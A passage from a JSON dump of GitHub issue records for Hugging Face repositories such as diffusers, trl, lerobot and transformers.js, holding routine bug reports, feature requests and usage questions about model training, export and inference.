script?: \n- Using distributed or parallel set-up in script?: \n- \n```", "url": "https://github.com/huggingface/diffusers/issues/10710", "state": "closed", "labels": [], "created_at": "2025-02-03T17:42:37Z", "updated_at": "2025-02-23T17:56:26Z", "comments": 4, "user": "nitinmukesh" }, { "repo": "huggingface/trl", "number": 2754, "title": "How to do multi-node training for GRPO with DeepSpeed + vLLM?", "body": "### Multi-Node Request \n\nI am interested in doing multi-node (4 x 8 GPUs) reinforcement fine-tuning of 8B (or 14B) models using GRPO. However, given that at least 1 GPU needs to be assigned to vLLM, I am not sure how to exactly run multi-node setup? Would it be possible for you to share a simple set of scripts (config files and main .py file) with which I can test locally?\n\n### Possible to give more GPUs to vLLM?\n\nAlso, in case of multi-node training, would it better to assign more GPUs to vLLM for faster (distributed) generation? Currently if I pass \u201ccuda:6,7\u201d, then it throws an error saying expected base 10 single digit number.\n", "url": "https://github.com/huggingface/trl/issues/2754", "state": "closed", "labels": [ "\ud83d\ude80 deepspeed", "\ud83c\udfcb GRPO" ], "created_at": "2025-02-03T16:03:23Z", "updated_at": "2025-03-22T12:51:19Z", "user": "nikhilchandak" }, { "repo": "huggingface/lerobot", "number": 673, "title": "configure_motor.py says it's increasing the max acceleration of feetech motors, but is decreasing it", "body": "I built my SO ARM 100s before reading the huggingface instructions, so I am trying to retroactively setup the servos properly. 
I looked into configure_motor.py to see what it was doing so I could configure it manually, and I notice that for Feetech motors it sets Maximum_Acceleration to 254 to \" speedup acceleration and deceleration of the motors\". I read that value from all of the servos in both arms and the setting I was shipped with is 306, which, I assume, means faster acceleration and deceleration than 254.", "url": "https://github.com/huggingface/lerobot/issues/673", "state": "closed", "labels": [ "question", "robots" ], "created_at": "2025-02-01T18:46:30Z", "updated_at": "2025-04-07T15:52:20Z", "user": "jbrownkramer" }, { "repo": "huggingface/lerobot", "number": 672, "title": "Limited Range of Motion in 'Elbow Flex' Motor on SO-100 Follower Arm", "body": "# Issue: Limited Range of Motion in 'Elbow Flex' Motor on SO-100 Follower Arm\n\n## Description\nIn my build of the SO-100 arm, the follower arm exhibits an issue where the motor labeled **'elbow flex'** is restricted to a movement range of approximately **90 degrees from the rest position**.\n\n## Steps Taken to Troubleshoot\nI have attempted the following troubleshooting steps:\n\n- **Checked the servo separately**: The servo itself functions correctly and can move the full 360-degree range without issues.\n- **Tested manual movement**: Manually tested the servo under normal teleoperation conditions with the weight of the arm.\n- **Re-calibrated multiple times**: Repeated calibration to see if the issue persists.\n- **Modified calibration JSON manually**: Editing the JSON file generated after calibration had no effect. The **homing_offset** field is the only one that causes any noticeable changes, but it only shifts the relative position of the follower to the leader, which is not a viable solution.\n- **Swapped servos**: Replaced the servo with a new one to rule out hardware failure, but the issue remains.\n\n## Expected Behavior\nThe **'elbow flex'** motor should be able to move the full intended range, similar to the leader arm, without being restricted to 90 degrees.\n\n## Actual Behavior\nThe motor is constrained to only about **90 degrees of movement** from its rest position, despite the servo itself being capable of full rotation.\n\n## Additional Notes\n- The issue seems to persist despite changes in hardware and re-calibration.\n- There may be an issue with how the calibration data is applied or interpreted.\n- Any insights into possible firmware, software, or mechanical constraints would be appreciated.\n\n---\nWould appreciate any help or guidance on resolving this issue!\n", "url": "https://github.com/huggingface/lerobot/issues/672", "state": "closed", "labels": [ "question", "robots", "stale" ], "created_at": "2025-02-01T15:01:59Z", "updated_at": "2025-10-20T02:31:48Z", "user": "ParzivalExtrimis" }, { "repo": "huggingface/sentence-transformers", "number": 3207, "title": "How to increase batch size by using multiple gpus?", "body": "Hello! My fine-tuned model need a large batch size to get the best performance. I have multiple gpus with 40G VRAM each. How can i use them together to enlarge the batch size? Currently i can only set the batch size be 3 per GPU and seems they won't share the datas. 
How can i make the total batch size become 24?", "url": "https://github.com/huggingface/sentence-transformers/issues/3207", "state": "open", "labels": [], "created_at": "2025-01-31T18:00:08Z", "updated_at": "2025-02-19T10:36:28Z", "user": "13918763630" }, { "repo": "huggingface/optimum", "number": 2174, "title": "Support for ONNX export of SeamlessM4TModel", "body": "### Feature request\n\nAdd SeamlessM4Tv2 Model support to onnx_export_from_model.\n\n\n### Motivation\n\nBeing able to deploy SeamlessM4Tv2 models to production using onnx.\n\n### Your contribution\n\nI got the speech-to-text model to ONNX, but I'm not able to generate the audio as expected, even though I'm trying to give the tgt_lang_token_ids as decoder_input_ids. I could help with by submitting a PR, but I might start creating the model_config/model_patcher first if it is needed.\n\n\nEDIT: I got the speech-to-text model, not the speech-to-speech model. I'd like to export the t2u_model and the vocoder to onnx, but it seems that is giving problems, any advice on how to do it?", "url": "https://github.com/huggingface/optimum/issues/2174", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-01-30T15:10:31Z", "updated_at": "2025-03-18T02:07:02Z", "comments": 3, "user": "AlArgente" }, { "repo": "huggingface/diffusers", "number": 10683, "title": "Would anyone consider a diffusers export_to_frames utility fuction?", "body": "**Is your feature request related to a problem? Please describe.**\nThe current `export_to_video` function in Hugging Face's Diffusers library exports a compressed video, but it's not straightforward for users to obtain raw, lossless PNG frames from a list of frames. This can be a problem for users who need to work with individual frames or want to export them in a specific format as part of a workflow.\n\n**Describe the solution you'd like.**\nI propose introducing a new function, `export_to_frames`, in `huggingface/diffusers/utils/export_utils.py`. This function would take a the frames (either NumPy arrays or PIL Image objects) and export each frame as a separate PNG file in a specified output directory. The function would also allow users to specify the frame rate and output directory.\n\n**Describe alternatives you've considered.**\nWhile users can currently solve this problem on their own by using other libraries or writing custom code, it would be beneficial to provide a simple and standard method for exporting raw, uncompressed PNG frames. This would save users time and effort, and make the Diffusers library more user-friendly.\n\n**Additional context.**\nI've included very rough example implementation of the proposed `export_to_frames` function below:\n\n`\ndef export_to_frames(\n video_frames: Union[List[np.ndarray], List[PIL.Image.Image]], output_dir: str = None, fps: int = 10\n) -> str:\n \"\"\"\n Export each frame in a list of frames to a directory.\n\n Args:\n video_frames (Union[List[np.ndarray], List[PIL.Image.Image]]): A list of frames.\n output_dir (str, optional): The directory where the frames will be saved. Defaults to None.\n fps (int, optional): The frame rate. Defaults to 10.\n\n Returns:\n str: The path to the output directory.\n \"\"\"\n\n try:\n imageio.plugins.ffmpeg.get_exe()\n except AttributeError:\n raise AttributeError(\n (\n \"Found an existing imageio backend in your environment. Attempting to export frames with imageio. \\n\"\n \"Unable to find a compatible ffmpeg installation in your environment to use with imageio. 
Please install via pip install imageio-ffmpeg\"\n )\n )\n print( \"video_frames\",len(video_frames) )\n\n if isinstance(video_frames[0], np.ndarray):\n print( \"numpy\")\n video_frames = [(frame * 255).astype(np.uint8) for frame in video_frames]\n\n elif isinstance(video_frames[0], PIL.Image.Image):\n print( \"PIL\")\n video_frames = [np.array(frame) for frame in video_frames]\n\n print( \"video_frames\",len(video_frames) )\n\n for i, frame in enumerate(video_frames):\n print( \"frame\", i )\n filename = f\"frame_{i:04d}.png\"\n if isinstance(frame, np.ndarray):\n print(\"wrote via np\")\n imageio.imwrite(os.path.join(output_dir, filename), frame)\n elif isinstance(frame, PIL.Image.Image):\n print(\"wrote via PIL\")\n frame.save(os.path.join(output_dir, filename))\n\n return output_dir`\n\nThis rough function was tested briefly but should be rewritten I'm just using it for illustrative purposes since it worked. Please let me know if this idea is worth considering further and if we could proceed with something like this in the standard utilities in future?", "url": "https://github.com/huggingface/diffusers/issues/10683", "state": "open", "labels": [ "stale" ], "created_at": "2025-01-29T17:30:21Z", "updated_at": "2025-03-26T15:04:10Z", "comments": 4, "user": "lovetillion" }, { "repo": "huggingface/transformers.js", "number": 1174, "title": "How to create a new onnx TTS model like mms-tts-eng", "body": "### Question\n\nFirst of all, congratulations on such a great library!\n\nI would like to ask for your guidance and assistance in creating a new onnx model similar to the following one: \n\nhttps://huggingface.co/Xenova/mms-tts-eng/tree/main \n\n\u2026but for the Malagasy language: \n\nhttps://huggingface.co/facebook/mms-tts-mlg \n\nCould you provide me with some advice on how to create that model?\n\nThank you so much.", "url": "https://github.com/huggingface/transformers.js/issues/1174", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-29T16:02:13Z", "updated_at": "2025-02-05T12:48:57Z", "user": "elloza" }, { "repo": "huggingface/open-r1", "number": 113, "title": "What is the GPU resource required to run Open-R1 (Deepseek-R1) locally?", "body": "I am trying to run it using Ollama with Open WebUI in a docker container, does it required a dedicated GPU with high VRAM or an integrated GPU? 
\n\nWhich model (8 billion, 9 billion, 12 billion parameters) can run with each GPU VRAM size?", "url": "https://github.com/huggingface/open-r1/issues/113", "state": "open", "labels": [], "created_at": "2025-01-29T14:08:47Z", "updated_at": "2025-01-29T21:17:17Z", "user": "ruidazeng" }, { "repo": "huggingface/open-r1", "number": 100, "title": "What is the compute needed for GRPO for 7B R1-Distill model?", "body": "Anybody who has tried GRPO over any of the R1-Distill models: what is the minimum GPU compute requirement to run the training?\nLet's say for R1-Distill-Qwen-7B ?\n\nI am talking about this from the README:\n\n### GRPO\n```\naccelerate launch --config_file configs/zero3.yaml src/open_r1/grpo.py \\\n --output_dir DeepSeek-R1-Distill-Qwen-7B-GRPO \\\n --model_name_or_path deepseek-ai/DeepSeek-R1-Distill-Qwen-7B \\\n --dataset_name AI-MO/NuminaMath-TIR \\\n --max_prompt_length 256 \\\n --per_device_train_batch_size 1 \\\n --gradient_accumulation_steps 16 \\\n --logging_steps 10 \\\n --bf16\n```", "url": "https://github.com/huggingface/open-r1/issues/100", "state": "open", "labels": [], "created_at": "2025-01-29T03:01:03Z", "updated_at": "2025-02-10T09:17:47Z", "user": "iamansinha" }, { "repo": "huggingface/diffusers", "number": 10677, "title": "Support for training with Grayscale images?", "body": "I am trying to train an unconditional diffusion model on grayscale images using your [pipeline](https://huggingface.co/docs/diffusers/training/unconditional_training). When running training with the default parameters I discovered inferred images that contained colour (specifically green). Where it learnt such colours from I do not know, but I would predict the issue lies within the initial processing of the image set:\n\n`images = [augmentations(image.convert(\"RGB\")) for image in examples[\"image\"]]`\n\nAs such, I created a fork of this [repo](https://github.com/DavidGill159/diffusers/tree/main/examples/unconditional_image_generation) and changed this line to:\n\n`images = [augmentations(image.convert(\"L\")) for image in examples[\"image\"]]`\n\nI also updated the model configuration (UNet2DModel) to work with single-channel inputs and outputs by setting `in_channels=1` and `out_channels=1` when initialising the model.\n\nAm I on the right track, or does the solution lie elsewhere? I also noticed the resolution of the inferred images is very poor; not on par with the training set. What parameters can I adjust to improve this?\n**Ultimately I am interested in a diffusion model that focuses more on the textural composition of images, rather than the colour.**
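\n\nFor reference, the full set of changes I made looks roughly like this (sketched from memory; the resolution and normalization values are just the ones I happen to use):\n\n```python\nfrom diffusers import UNet2DModel\nfrom torchvision import transforms\n\n# Single-channel preprocessing: convert to \"L\" instead of \"RGB\",\n# and normalize with one mean/std per channel.\naugmentations = transforms.Compose(\n    [\n        transforms.Resize(64),\n        transforms.CenterCrop(64),\n        transforms.ToTensor(),\n        transforms.Normalize([0.5], [0.5]),\n    ]\n)\n\ndef transform(examples):\n    images = [augmentations(image.convert(\"L\")) for image in examples[\"image\"]]\n    return {\"input\": images}\n\n# UNet configured for 1-channel inputs and outputs.\nmodel = UNet2DModel(\n    sample_size=64,\n    in_channels=1,\n    out_channels=1,\n)\n```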
", "url": "https://github.com/huggingface/diffusers/issues/10677", "state": "open", "labels": [ "stale" ], "created_at": "2025-01-28T22:25:19Z", "updated_at": "2025-02-28T15:02:57Z", "comments": 1, "user": "DavidGill159" }, { "repo": "huggingface/diffusers", "number": 10675, "title": "Difference in Flux scheduler configuration max_shift", "body": "### Describe the bug\n\nCould you please check if the value of 1.16 here...\nhttps://github.com/huggingface/diffusers/blob/658e24e86c4c52ee14244ab7a7113f5bf353186e/src/diffusers/pipelines/flux/pipeline_flux.py#L78\n\n...is intentional or maybe a typo?\n\n`max_shift` is 1.15 both in the model configuration...\nhttps://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/scheduler/scheduler_config.json\n...and in the original inference code by BFL:\nhttps://github.com/black-forest-labs/flux/blob/d06f82803f5727a91b0cf93fcbb09d920761fba1/src/flux/sampling.py#L214\n\n\n\n### Reproduction\n\n-\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n-\n\n### Who can help?\n\n@yiyixuxu @DN6", "url": "https://github.com/huggingface/diffusers/issues/10675", "state": "closed", "labels": [ "bug", "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2025-01-28T20:35:58Z", "updated_at": "2025-02-18T06:54:58Z", "comments": 2, "user": "dxqb" }, { "repo": "huggingface/transformers.js", "number": 1171, "title": "Does the image generation model support using LoRA?", "body": "### Question\n\nI would like to implement an image generation feature to my website using a image generation model and a LoRA. Is LoRA supported in transformers.js?", "url": "https://github.com/huggingface/transformers.js/issues/1171", "state": "open", "labels": [ "question" ], "created_at": "2025-01-28T19:48:38Z", "updated_at": "2025-02-11T23:11:27Z", "user": "hunkim98" }, { "repo": "huggingface/diffusers", "number": 10672, "title": "Please support callback_on_step_end for following pipelines", "body": "**Is your feature request related to a problem? Please describe.**\nMissing callback_on_step_end in these pipeline takes away the capability to show the progress in UI\n\n**Describe the solution you'd like.**\nPlease support callback_on_step_end\n\n**Describe alternatives you've considered.**\nN.A.\n\n**Additional context.**\n1. AuraFlowPipeline\nTypeError: AuraFlowPipeline.__call__() got an unexpected keyword argument 'callback_on_step_end'\n\n2. LuminaText2ImgPipeline", "url": "https://github.com/huggingface/diffusers/issues/10672", "state": "closed", "labels": [ "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2025-01-28T16:26:56Z", "updated_at": "2025-02-16T17:28:58Z", "comments": 2, "user": "nitinmukesh" }, { "repo": "huggingface/transformers.js", "number": 1170, "title": "Processing in image encoding for Florence 2", "body": "### Question\n\nHi,\n\nwhile having a look at the code for generation with the Florence 2 model, I've noticed something weird. The original code for inference uses the [_encode_image](https://huggingface.co/microsoft/Florence-2-base-ft/blob/main/modeling_florence2.py#L2599) method for creating image features. However, looking at the [encode_image](https://github.com/huggingface/transformers.js/blob/main/src/models.js#L1861C1-L1874C6) used in `transformers.js`, I've noticed the postprocessing after the model forward pass is missing. 
Here's a minimal reproducible example:\n\n```python\nimport onnxruntime as ort\n\nfrom transformers import AutoModelForCausalLM, AutoProcessor\nfrom PIL import Image\n\n# The vision encoder was downloaded from:\n# https://huggingface.co/onnx-community/Florence-2-base-ft/resolve/main/onnx/vision_encoder.onnx\nONNX_MODEL_PATH = \"models/onnx/original/vision_encoder.onnx\"\nMODEL_NAME = \"microsoft/Florence-2-base-ft\"\n# Image download link:\n# https://upload.wikimedia.org/wikipedia/en/7/7d/Lenna_%28test_image%29.png\nIMG_PATH = \"lena.png\"\nPROMPT = \"\"\n\nprocessor = AutoProcessor.from_pretrained(\n MODEL_NAME, trust_remote_code=True)\nmodel = AutoModelForCausalLM.from_pretrained(\n MODEL_NAME, trust_remote_code=True)\n\nimage = Image.open(IMG_PATH)\ninputs = processor(text=PROMPT, images=image, return_tensors=\"pt\")\n\nhf_out = model._encode_image(inputs[\"pixel_values\"])\n\nort_vision_tower = ort.InferenceSession(ONNX_MODEL_PATH)\nort_out = ort_vision_tower.run(\n None, {\"pixel_values\": inputs[\"pixel_values\"].numpy()})[0]\n\nprint(hf_out.cpu().detach().numpy())\nprint()\nprint(ort_out)\n```\nThe feature differences are pretty big:\n```\n[[[-0.4047455 0.51958734 -0.23121671 ... 1.0019573 -0.46846968\n 0.5289913 ]\n [-0.08135182 -2.0622678 -0.50597775 ... 0.38061845 -0.7858853\n -1.247189 ]\n [ 0.69417834 -1.926735 -0.691345 ... -0.17574754 -0.98472327\n -1.2420652 ]\n ...\n [ 0.018062 1.2185848 -0.04483193 ... 0.61767036 -0.1832848\n 0.9324351 ]\n [-0.13765828 0.7120823 0.12478658 ... -0.44853052 -0.6390534\n 0.37095645]\n [ 0.58084226 1.6617624 -0.43527135 ... -0.92560166 -0.47037867\n -0.81996024]]]\n\n[[[-0.52661824 0.508744 -0.24130312 ... 0.91191643 -0.39472336\n 1.1632534 ]\n [-0.18091503 -2.2187433 -0.7923498 ... 0.6103708 -0.49637306\n -0.9830185 ]\n [ 0.3002218 -1.9726763 -1.1151179 ... -0.11572987 -0.6870862\n -0.96058726]\n ...\n [-0.08202907 0.8105656 -0.1748765 ... 1.0833437 -0.41167092\n 1.2495995 ]\n [-0.01531404 0.6044417 -0.06392197 ... -0.30775025 -0.5735508\n 0.6775356 ]\n [ 0.74322057 1.4011574 -0.5277405 ... -0.61488384 -0.40253094\n -0.8440974 ]]]\n```\n\nAm I missing something here or is this a potential bug?", "url": "https://github.com/huggingface/transformers.js/issues/1170", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-27T16:13:28Z", "updated_at": "2025-03-02T14:37:52Z", "user": "ir2718" }, { "repo": "huggingface/text-generation-inference", "number": 2956, "title": "How to give custom model code for TGI to run.", "body": "Is there a way to give custom model inference code for TGI to run during invocation? 
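\n\nFor context, I mean something like the custom modeling files that plain transformers can load with `trust_remote_code=True` (file and class names below are hypothetical):\n\n```python\n# modeling_custom.py, shipped alongside the weights on the Hub\nfrom transformers import LlamaConfig, LlamaForCausalLM\n\n\nclass MyCustomConfig(LlamaConfig):\n    model_type = \"my-custom-llama\"\n\n\nclass MyCustomModel(LlamaForCausalLM):\n    \"\"\"Same architecture, but with my own pre/post-processing in forward().\"\"\"\n```\n\nIf I point TGI at such a repo (e.g. with `--trust-remote-code`), will it pick the custom class up, or does TGI only run its own in-tree model implementations?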
", "url": "https://github.com/huggingface/text-generation-inference/issues/2956", "state": "open", "labels": [], "created_at": "2025-01-27T10:37:55Z", "updated_at": "2025-01-27T10:37:55Z", "user": "ashwani-bhat" }, { "repo": "huggingface/diffusers", "number": 10662, "title": "Feature Request: Image-to-Image Fine-Tuning Example", "body": "Hello, and thank you for maintaining this amazing repository!\nWhile working with the Diffusers library, I noticed there is a folder containing fine-tuning examples for text-to-image models but not for image-to-image fine-tuning.\n\nSince image-to-image models have many use cases (e.g., style transfer, image restoration, or domain-specific adaptation), a fine-tuning example for this task would greatly benefit the community and improve accessibility for users looking to customize such models.\n\nQuestions:\n\n* Is there any existing implementation or documentation for fine-tuning image-to-image models that I might have missed?\n* If not, is there a specific reason this example hasn't been provided yet (e.g., complexity, low demand)?\nI'd be happy to contribute or collaborate on this feature if it's considered valuable.\n\nThank you in advance for your time and response!", "url": "https://github.com/huggingface/diffusers/issues/10662", "state": "closed", "labels": [], "created_at": "2025-01-27T08:33:39Z", "updated_at": "2025-02-07T08:27:44Z", "comments": 6, "user": "YanivDorGalron" }, { "repo": "huggingface/finetrainers", "number": 248, "title": "How to load full finetune for inference?", "body": "### Feature request / \u529f\u80fd\u5efa\u8bae\n\n![Image](https://github.com/user-attachments/assets/c352bc74-8d56-4090-a46d-3c9a4bdf1a9d)\n\n### Motivation / \u52a8\u673a\n\nIt seems like only lora inference example in README.MD\n\n### Your contribution / \u60a8\u7684\u8d21\u732e\n\ntest the full finetune(LTX-VIDEO,Cogxvideo)", "url": "https://github.com/huggingface/finetrainers/issues/248", "state": "closed", "labels": [], "created_at": "2025-01-27T03:49:57Z", "updated_at": "2025-01-27T06:27:18Z", "user": "BlackTea-c" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 143, "title": "Route to /generate and /metrics", "body": "Hello team, thanks for supporting :)\n\nInside https://github.com/huggingface/text-generation-inference/blob/main/router/src/server.rs file,\n\nthere is a route for google cloud definition as below.\n\n #[cfg(feature = \"google\")]\n {\n tracing::info!(\"Built with `google` feature\");\n tracing::info!(\n \"Environment variables `AIP_PREDICT_ROUTE` and `AIP_HEALTH_ROUTE` will be respected.\"\n );\n if let Ok(env_predict_route) = std::env::var(\"AIP_PREDICT_ROUTE\") {\n app = app.route(&env_predict_route, post(vertex_compatibility));\n }\n if let Ok(env_health_route) = std::env::var(\"AIP_HEALTH_ROUTE\") {\n app = app.route(&env_health_route, get(health));\n }\n }\n\nCurrently, there is no way to access /generate through VAI because if we define AIP_PREDICT_ROUTE outside of container then it creates new path for prediction.\nThe problem is that new features like json generation (https://huggingface.co/docs/text-generation-inference/en/guidance) only supports through /generate path.\n\nCan we change this pattern that if AIP_PREDICT_ROUTE or AIP_HEALTH_ROUTE points existing path, then do nothing ?\n\nThen we can route default VAI predict path to /generate and also expose /metrics path through VAI health path.", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/143", "state": "closed", "labels": [ "question" ], 
"created_at": "2025-01-27T02:02:28Z", "updated_at": "2025-01-31T11:44:05Z", "user": "jk1333" }, { "repo": "huggingface/optimum", "number": 2171, "title": "Adding Phi3 support in BetterTransformer (to use the microsoft/phi-4 model)", "body": "### Feature request\n\nHello,\n\nIs it possible to add the phi3 architecture to BetterTransformer supported models?\n\n### Motivation\n\nNan\n\n### Your contribution\n\nNan", "url": "https://github.com/huggingface/optimum/issues/2171", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-01-26T19:10:34Z", "updated_at": "2025-03-04T02:05:22Z", "comments": 2, "user": "majdabd" }, { "repo": "huggingface/transformers.js", "number": 1167, "title": "How to create and use a customized voice in a tts pipeline?", "body": "### Question\n\nHi transformers.js community!\nI am new here and I\u2019d like to ask how to create a new voice and use it inside the current tts pipeline? I just create a next.js project and I can run the text-to-speech model in the tutorial, like following code,\n```\n const synthesizer = await pipeline('text-to-speech', 'Xenova/speecht5_tts', { quantized: false }); \n const speaker_embeddings = 'https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/speaker_embeddings.bin';\n const out = await synthesizer('Hello, my dog is cute', { speaker_embeddings });`\n```\nNow I want to create a new voice and use it in the pipeline, how should I do? Can I realize it in the same environment? (The speaker creation and speech generation are both processed in the next.js web app). I have searched the web but there is no any tutorials or demo on that, looking forward for the answers! \n\nBest!", "url": "https://github.com/huggingface/transformers.js/issues/1167", "state": "open", "labels": [ "question" ], "created_at": "2025-01-26T17:44:57Z", "updated_at": "2025-02-11T02:55:40Z", "user": "gonggqing" }, { "repo": "huggingface/open-r1", "number": 56, "title": "How to supervise non-math data?", "body": "I see the accuracy reward only can check the numerical equal? But what if my question is MCQ and asking an option? \n\nI did a quick check and find it's not working.\n\n```\nfrom math_verify import parse, verify\n\n# Parse the gold and answer\n# If you know that gold will only contain latex or expr (no latex env), use\n# parse(gold, extraction_config=[LatexExtractionConfig()]) or parse(gold, extraction_config=[ExprExtractionConfig()])\n\ngold = parse(\"So the answer is B\")\nanswer = parse(\"B\")\n\nprint(gold)\nprint(answer)\n# Order here is important!\nprint(verify(gold, answer))\n\n\n[]\n[]\nFalse\n```", "url": "https://github.com/huggingface/open-r1/issues/56", "state": "open", "labels": [], "created_at": "2025-01-26T14:30:13Z", "updated_at": "2025-01-26T17:52:58Z", "user": "Luodian" }, { "repo": "huggingface/diffusers", "number": 10655, "title": "How to use custon dataset in train_dreambooth_flux.py.", "body": "Hi. what if i want to train two images with two different prompts. somethink like m1.jpeg , m1.txt ; m2.jpeg, m2.txt.\nthe default example only shows all images share one instant prompt. 
thanks for the help!", "url": "https://github.com/huggingface/diffusers/issues/10655", "state": "closed", "labels": [], "created_at": "2025-01-26T11:53:01Z", "updated_at": "2025-01-27T19:43:55Z", "user": "rooooc" }, { "repo": "huggingface/open-r1", "number": 46, "title": "how to train on MultiNode MultiGPU", "body": "", "url": "https://github.com/huggingface/open-r1/issues/46", "state": "open", "labels": [], "created_at": "2025-01-26T04:57:11Z", "updated_at": "2025-02-19T14:00:44Z", "user": "yuepengs" }, { "repo": "huggingface/transformers.js", "number": 1166, "title": "Why isn't transformers using filesystem API instead of Cache API?", "body": "### Question\n\nI find the cache API quite limiting when it comes to user experience. I am curious why transformers.js is not utilizing filesystem API. Is there any practical difficulty in it?\n", "url": "https://github.com/huggingface/transformers.js/issues/1166", "state": "open", "labels": [ "question" ], "created_at": "2025-01-25T14:12:38Z", "updated_at": "2025-02-08T12:09:16Z", "user": "Nithur-M" }, { "repo": "huggingface/open-r1", "number": 23, "title": "How to contribute", "body": "Hello there \ud83d\udc4b!\n\nReplicating all parts of DeepSeek's R1 pipeline is going to take a community effort, especially with dataset curation and creation. If you would like to contribute, please explore the issues linked below.", "url": "https://github.com/huggingface/open-r1/issues/23", "state": "open", "labels": [], "created_at": "2025-01-25T13:55:31Z", "updated_at": "2025-05-06T13:32:10Z", "user": "lewtun" }, { "repo": "huggingface/trl", "number": 2642, "title": "How to stop `SFTTrainer` from auto tokenizing my messages ?", "body": "I want to tokenize my text in a custom way in a custom data collator but for some reason i don't know the data keeps being auto tokenized.\nI passed `processing_class=None` to stop this but nothing changed, how can i stop the auto tokenization process ?", "url": "https://github.com/huggingface/trl/issues/2642", "state": "closed", "labels": [ "\u2753 question", "\ud83c\udfcb SFT" ], "created_at": "2025-01-24T02:58:26Z", "updated_at": "2025-02-18T18:59:42Z", "user": "MohamedAliRashad" }, { "repo": "huggingface/diffusers", "number": 10637, "title": "Issues with FlowMatchEulerDiscreteScheduler.set_timesteps()", "body": "### Describe the bug\n\nWhy does `num_inference_steps` have the default `None`? It's not an `Optional`. It cannot be `None`. 
This leads to weird error messages if you skip this parameter.\nhttps://github.com/huggingface/diffusers/blob/37c9697f5bb8c96b155d24d5e7382d5215677a8f/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L239\n\n`sigmas` is undocumented:\nhttps://github.com/huggingface/diffusers/blob/37c9697f5bb8c96b155d24d5e7382d5215677a8f/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L241\n\n`mu` is undocumented, even though it can be a required parameter (depending on configuration):\nhttps://github.com/huggingface/diffusers/blob/37c9697f5bb8c96b155d24d5e7382d5215677a8f/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L242\n\n### Reproduction\n\nsee above\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nHEAD\n\n### Who can help?\n\n@yiyixuxu ", "url": "https://github.com/huggingface/diffusers/issues/10637", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-23T20:22:51Z", "updated_at": "2025-02-16T15:29:08Z", "comments": 4, "user": "dxqb" }, { "repo": "huggingface/transformers.js", "number": 1165, "title": "Releasing the Florence 2 ONNX conversion script?", "body": "### Question\n\nHi,\n\nThis might not be the correct place to raise this issue, but I have not found a better option. There have been many requests from people trying to use their tuned Florence 2 models here and in other repos (https://github.com/huggingface/transformers.js/issues/815#issuecomment-2217220254, https://github.com/microsoft/onnxruntime-genai/issues/619, https://github.com/microsoft/onnxruntime/issues/21118, https://huggingface.co/onnx-community/Florence-2-base-ft/discussions/4). @xenova, since you've managed to export these models into ONNX, could you please share the conversion script, even if it's just something experimental?", "url": "https://github.com/huggingface/transformers.js/issues/1165", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-23T11:35:05Z", "updated_at": "2025-03-31T10:02:53Z", "user": "ir2718" }, { "repo": "huggingface/transformers", "number": 35853, "title": "How to load a model directly into the GPU memory?", "body": "I have enough GPU memory, but not enough CPU memory. When I use the \"from_pretrained\" function, the program gets killed due to insufficient memory.", "url": "https://github.com/huggingface/transformers/issues/35853", "state": "closed", "labels": [], "created_at": "2025-01-23T09:47:04Z", "updated_at": "2025-01-23T15:19:01Z", "user": "LiBai531" }, { "repo": "huggingface/nanotron", "number": 273, "title": "What is the purpose of \"task\"", "body": "What is the purpose of the \"tasks\" argument in this line?\nhttps://github.com/huggingface/nanotron/blob/9055c664c28a3b430b4e53bfcb5a074068c90f2a/tools/preprocess_data.py#L102C9-L102C28\nThanks", "url": "https://github.com/huggingface/nanotron/issues/273", "state": "open", "labels": [], "created_at": "2025-01-23T09:44:35Z", "updated_at": "2025-02-07T17:09:12Z", "user": "laiviet" }, { "repo": "huggingface/transformers.js", "number": 1164, "title": "`onnxruntime-node` uncompressed too large for NextJS 15 API routes", "body": "### Question\n\nHello! I'm trying to deploy `xenova/bge-small-en-v1.5` locally to embed text in a Next 15 API route, but I'm encountering this error with the route's unzipped max size exceeding 250 MB. Wanted to check in to see if there's some error on my side? Doesn't seem like `onnxruntime-node` should be ~720 MB uncompressed by itself?
Thanks!\n\n![Image](https://github.com/user-attachments/assets/2c33f54b-86ab-4c26-8407-aa87223b8d3c)\n\n`generateEmbeddingV2()` below is called within the API route.\n\n```typescript\nimport {\n FeatureExtractionPipeline,\n layer_norm,\n pipeline,\n PreTrainedTokenizer,\n env,\n} from '@huggingface/transformers'\n\nconst MAX_TOKENS = 512\nconst MATRYOSHKA_DIM = 768\n\nlet cachedExtractor: FeatureExtractionPipeline | null = null\nconst getExtractor = async () => {\n if (!cachedExtractor) {\n cachedExtractor = await pipeline(\n 'feature-extraction',\n 'xenova/bge-small-en-v1.5',\n { dtype: 'fp16' }\n )\n }\n return cachedExtractor\n}\n\nconst chunkText = (text: string, tokenizer: PreTrainedTokenizer) => {\n const tokens = tokenizer.encode(text)\n\n const chunks = []\n for (let i = 0; i < tokens.length; i += MAX_TOKENS) {\n const chunk = tokens.slice(i, i + MAX_TOKENS)\n chunks.push(chunk)\n }\n\n return chunks.map((chunk) => tokenizer.decode(chunk))\n}\n\nexport const generateEmbeddingV2 = async (value: string) => {\n const extractor = await getExtractor()\n\n const chunks = chunkText(value, extractor.tokenizer)\n\n let embedding = await extractor(chunks[0], { pooling: 'mean' })\n embedding = layer_norm(embedding, [embedding.dims[1]])\n .slice(null, [0, MATRYOSHKA_DIM])\n .normalize(2, -1)\n\n return embedding.tolist()[0]\n}\n```\n\nI also tried downloading the model file locally, but that didn't work in deployment either.", "url": "https://github.com/huggingface/transformers.js/issues/1164", "state": "open", "labels": [ "question" ], "created_at": "2025-01-23T03:28:16Z", "updated_at": "2025-10-22T20:42:41Z", "user": "raymondhechen" }, { "repo": "huggingface/smolagents", "number": 322, "title": "How to capture CodeAgent's full thinking including the code, not just the final response into a variable", "body": "When we run a CodeAgent in a notebook, it prints the question/task, the LLM model used, 